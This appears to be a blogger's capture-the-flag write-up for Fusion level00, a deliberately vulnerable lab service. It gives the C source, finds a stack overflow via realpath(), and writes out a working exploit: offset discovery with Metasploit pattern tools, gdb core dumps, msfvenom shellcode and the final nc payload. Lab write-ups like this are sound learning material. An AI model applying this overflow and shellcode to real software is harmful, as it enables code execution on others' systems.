After a little over half a month I finished Protostar, rested for a few days, and now move on to Fusion.
*********Aside begins**********
Back at university I agonized over whether to go down the programmer's road, and gave it up because long stretches of heavy coding made me feel unwell; still, I have to praise that feeling you get when a bug is finally fixed. These days, finishing a challenge gives me that same feeling~~~~
*********Aside ends**********
level00 source:
#include "../common/common.c"

int fix_path(char *path)
{
    char resolved[128];

    if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
    strcpy(path, resolved);
}

char *parse_http_request()
{
    char buffer[1024];
    char *path;
    char *q;

    printf("[debug] buffer is at 0x%08x :-)\n", buffer);

    if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
    if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

    path = &buffer[4];
    q = strchr(path, ' ');
    if(! q) errx(0, "No protocol version specified");
    *q++ = 0;
    if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");

    fix_path(path);
    printf("trying to access %s\n", path);
    return path;
}

int main(int argc, char **argv, char **envp)
{
    int fd;
    char *p;

    background_process(NAME, UID, GID);
    fd = serve_forever(PORT);
    set_io(fd);
    parse_http_request();
}
The Fusion challenges are the advanced follow-on to Protostar and are noticeably harder, although level00 is still a warm-up. The challenge hint tells us this is a stack problem, and that the shellcode should be placed outside the resolved array: realpath() is handed a 128-byte stack buffer, so a long path overruns it and the function's return address along with it.
Since it is a stack problem, let's start by feeding it a long string.
fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_create.rb 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
fusion@fusion:~$ python -c "print 'GET /'+'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9' + ' HTTP/1.1'" | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)
######################################################################
# To change where core files are written:                            #
# sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern'   #
######################################################################
Examine the core file with gdb:
fusion@fusion:/tmp$ sudo -s gdb --quiet --core=core.1368248639
[sudo] password for fusion:
[New LWP 2495]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0x65413665 in ?? ()
(gdb)
Now use the pattern_offset.rb tool to look up that value:
fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_offset.rb 0x65413665 139
So the overflowing bytes overwrite EIP at offset 139 of the input.
Next, put the shellcode into the input and use the core file to find where the shellcode lands in memory.
fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\xef\xbe\xad\xde' + ' HTTP/1.1' + '\x90'*100 + 'a'*100 " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)
***************
fusion@fusion:/tmp$ sudo -s gdb --core=core.1368255737
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>.
[New LWP 2833]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0xdeadbeef in ?? ()
(gdb) x/200x 0xbf89b340
0xbf89b340: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf89b350: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf89b360: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf89b370: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf89b380: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf89b390: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf89b3a0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf89b3b0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf89b3c0: 0x61616161 0x61616161 0xdeadbeef 0x54544800
0xbf89b3d0: 0x2e312f50 0x90909031 0x90909090 0x90909090
0xbf89b3e0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbf89b3f0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbf89b400: 0x90909090 0x90909090 0x90909090 0x90909090
0xbf89b410: 0x90909090 0x90909090 0x90909090 0x90909090
0xbf89b420: 0x90909090 0x90909090 0x90909090 0x90909090
0xbf89b430: 0x90909090 0x90909090 0x61616190 0x61616161
0xbf89b440: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf89b450: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf89b460: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf89b470: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf89b480: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf89b490: 0x0a616161 0x00000004 0xb77bc6e0 0x00000000
From the dump we can see that the bytes written after the protocol string start at 0xbf89b3d5. As before, a run of 0x90 is padded in front of the shellcode, so the payload layout should look like this:
GET /AAA……AA\x00\xb4\x89\xbf HTTP/1.10x90……0x90[SHELLCODE]
First, obtain a shellcode:
fusion@fusion:/opt/metasploit-framework$ sudo -s ./msfvenom -p linux/x86/exec -f pl CMD="touch /tmp/fusion_for_zsz"
[sudo] password for fusion:
my $buf =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" .
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00" .
"\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75" .
"\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57" .
"\x53\x89\xe1\xcd\x80";
And so:
fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\x10\xb4\x89\xbf' + ' HTTP/1.1' + '\x90'*100 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57\x53\x89\xe1\xcd\x80' " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)
fusion@fusion:/tmp$ ll
total 912
drwxrwxrwt  4 root  root     340 2013-05-11 17:30 ./
drwxr-xr-x  1 root  root     240 2013-05-11 22:50 ../
-rw-------  1 root  20000 196608 2013-05-11 15:03 core.1368248639
-rw-------  1 root  20000 196608 2013-05-11 15:33 core.1368250392
-rw-------  1 root  20000 196608 2013-05-11 15:36 core.1368250571
-rw-------  1 root  20000 196608 2013-05-11 15:41 core.1368250870
-rw-------  1 root  20000 196608 2013-05-11 15:46 core.1368251166
-rw-------  1 root  20000 196608 2013-05-11 15:51 core.1368251470
-rw-------  1 root  20000 196608 2013-05-11 16:02 core.1368252121
-rw-------  1 root  20000 196608 2013-05-11 17:02 core.1368255737
-rw-------  1 root  20000 196608 2013-05-11 17:16 core.1368256578
-rw-------  1 root  20000 196608 2013-05-11 17:16 core.1368256609
-rw-------  1 root  20000 196608 2013-05-11 17:19 core.1368256755
-rw-------  1 root  20000 196608 2013-05-11 17:24 core.1368257093
-rw-r--r--  1 20000 20000      0 2013-05-11 17:30 fusion_for_zsz
drwxrwxrwt  2 root  root      40 2013-05-11 22:50 .ICE-unix/
drwxrwxrwt  2 root  root      40 2013-05-11 22:50 .X11-unix/